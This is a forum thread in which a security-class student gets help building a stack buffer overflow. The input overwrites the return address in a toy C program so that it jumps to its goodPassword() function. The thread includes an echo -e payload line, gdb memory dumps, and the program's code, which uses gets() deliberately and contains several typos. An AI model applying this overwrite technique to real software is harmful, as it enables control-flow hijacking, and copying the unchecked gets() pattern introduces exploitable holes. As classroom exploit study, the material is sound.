Buffer overflow help

arbwok (63)
So I've been looking at this: http://www.cplusplus.com/forum/beginner/148111/
and I still don't really see what I should be looking at for hexedit. The code is similar, except the hex values.
I also don't know how they derived the output: 
$ echo -e "electroencefalografista\x0\x17\x6\x40" | ./a.out
ne555 (10692)
perhaps it's clearer here http://www.cplusplus.com/forum/unices/218100/#msg1006849
the idea is to find the position of the program counter in the stack, in order to know where to write the address of the function you want to execute. (I suppose that you may use hexedit to wrtie the input file)

By the way, got to compile with -std=c++98 and -fno-stack-protector and run it inside gdb


now, this is the third time I see this question so I'm curious, ¿what's the class about?
arbwok (63)
The class is forensics / security, so there's not much documentation to read up on this expect the man pages of commands.

So by following your steps i use:
 
break getPassword
Breakpoint 1 at 0x80484a1: file test.c, line 13.
gdb > run

eax:B7FBCDBC ebx:00000000  ecx:BFFFEFC0  edx:BFFFEFE4     eflags:00000286
esi:B7FBB000 edi:B7FBB000  esp:BFFFEF60  ebp:BFFFEF78     eip:080484A1
cs:0073  ds:007B  es:007B  fs:0000  gs:0033  ss:007B    o d I t S z a P c 

[007B:BFFFEF60]---------------------------------------------------------[stack]
BFFFEF90 : 01 00 00 00  54 F0 FF BF - 5C F0 FF BF  71 85 04 08 ....T...\...q...
BFFFEF80 : 05 00 00 00  00 00 80 00 - 50 7A E3 B7  9B 85 04 08 ........Pz......
BFFFEF70 : 01 00 00 00  00 40 00 00 - A8 EF FF BF  2C 85 04 08 .....@......,...
BFFFEF60 : FF FF FF FF  2F 00 00 00 - C8 5D E1 B7  58 68 FD B7 ..../....]..Xh..
[007B:B7FBB000]---------------------------------------------------------[ data]
B7FBB000 : B0 1D 1B 00  58 68 FD B7 - 20 00 FF B7  B6 06 E2 B7 ....Xh.. .......
B7FBB010 : C6 06 E2 B7  10 94 EA B7 - E6 06 E2 B7  70 8A E9 B7 ............p...
[0073:080484A1]---------------------------------------------------------[ code]
=> 0x80484a1 <getPassword+6>:    sub    $0xc,%esp
   0x80484a4 <getPassword+9>:    push   $0x80485d0
   0x80484a9 <getPassword+14>:    call   0x8048360 <puts@plt>
   0x80484ae <getPassword+19>:    add    $0x10,%esp
   0x80484b1 <getPassword+22>:    sub    $0xc,%esp
   0x80484b4 <getPassword+25>:    lea    -0x16(%ebp),%eax
------------------------------------------------------------------------------

Breakpoint 1, getPassword (x=0x5) at test.c:13

gdb > print main
$1 = {int ()} 0x8048507 <main>
gdb> print /x *buf@80

$2 = {0xff, 0xff, 0x2f, 0x0, 0x0, 0x0, 0xc8, 0x5d, 0xe1, 0xb7, 0x58, 0x68, 0xfd, 0xb7, 0x1, 0x0, 0x0, 0x0, 0x0, 0x40, 0x0, 0x0, 0xa8, 0xef, 0xff, 0xbf, 0x2c, 0x85, 0x4, 0x8, 0x5, 0x0, 0x0, 0x0, 0x0, 0x0, 0x80, 0x0, 0x50, 0x7a, 0xe3, 0xb7, 0x9b, 0x85, 0x4, 0x8, 0x1, 0x0, 0x0, 0x0, 0x54, 0xf0, 0xff, 0xbf, 0x5c, 0xf0, 0xff, 0xbf, 0x71, 0x85, 0x4, 0x8, 0xdc, 0xb3, 0xfb, 0xb7, 0xc0, 0xef, 0xff, 0xbf, 0x0, 0x0, 0x0, 0x0, 0x37, 0x16, 0xe2, 0xb7, 0x0, 0xb0, 0xfb, 0xb7, 0x0, 0xb0, 0xfb, 0xb7, 0x0, 0x0, 0x0, 0x0, 0x37, 0x16, 0xe2, 0xb7, 0x1, 0x0, 0x0, 0x0, 0x54, 0xf0, 0xff, 0xbf, 0x5c, 0xf0, 0xff, 0xbf, 0x0 <repeats 13 times>, 0xb0, 0xfb, 0xb7, 0x4, 0xfc, 0xff, 0xb7, 0x0, 0xf0}

gdb> print goodPassword
$3 = {void()} 0x80484e8
gdb > quit


This is what i get from using the gdb. How do I save the payload and then redirect it? Do i use the command
gdb > run < binary_file to redirect the file? But my problem would be understanding the payload and also redirecting it.

I don't know how the
$ echo -e "electroencefalografista\x0\x17\x6\x40" | ./program
should work

Last edited on
ne555 (10692)
$ echo -e "electroencefalografista\x0\x17\x6\x40" | ./program
electroencefalografista is filler, just to make the string long enough to override the program counter.
That may be a mistake though, because the compiler may put some canaries to detect buffer overflow (that's why the -fno-stack-protector flag), so perhaps should simply copy a memory dump from `buffer'.

\x0\x17\x6\x40 is the address of the function you want to execute (the address of goodPassword()), the -e flag interprets them as hexadecimal numbers instead of individual characters.
it's backwards because of endianness. keep in mind that gets() will add a zero terminator to the string.

Then a pipe is used to redirect the input of `program'.
To redirect inside gdb, use (gdb) run < input


Dump the content of buffer (and beyond), send it to a file.
Find the location of the program counter, use the backtrace as shown in the other thread.
Use an editor and change the value of the program counter to the address of the function you want to call
Use that file as the input of your program.

By the way, want to test some things, ¿could you show your code? ¿is it exactly the same as pel1993's?
And also, ¿what did you do to get the `[stack] ... [data] ... [code]' output from gdb?
arbwok (63)
My code is similar, but change getName to getPassword. For the output I just put a breakpoint at getPassword then I used the run command from gdb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
 
//
// program
//

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int admin;

int getPassword (int x){

	char buf[14];
	puts ("Enter your name: \n");
	get (buf);
	return (x+5);
}
void badPassword(){
	puts ("Try again\n")
	exit (0);

}
Void goodPassword(){
	printf("Great Success! You Earned admin %i privilges\n", admin);
	exit (0)
}
int main (){

	int name, x;
	admin=2;
	x = getPassword (5);
	if (x== 10){
		badPassword();
	}
return 0;
}


I need to write an attack payload that performs the buffer overflow, but not sure how the attack payload should work.
Last edited on
Topic archived. No new replies allowed.